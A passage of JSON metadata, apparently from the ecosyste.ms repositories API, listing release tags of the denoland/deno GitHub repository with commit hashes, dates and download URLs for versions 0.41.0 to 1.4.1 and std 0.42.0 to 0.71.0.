yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/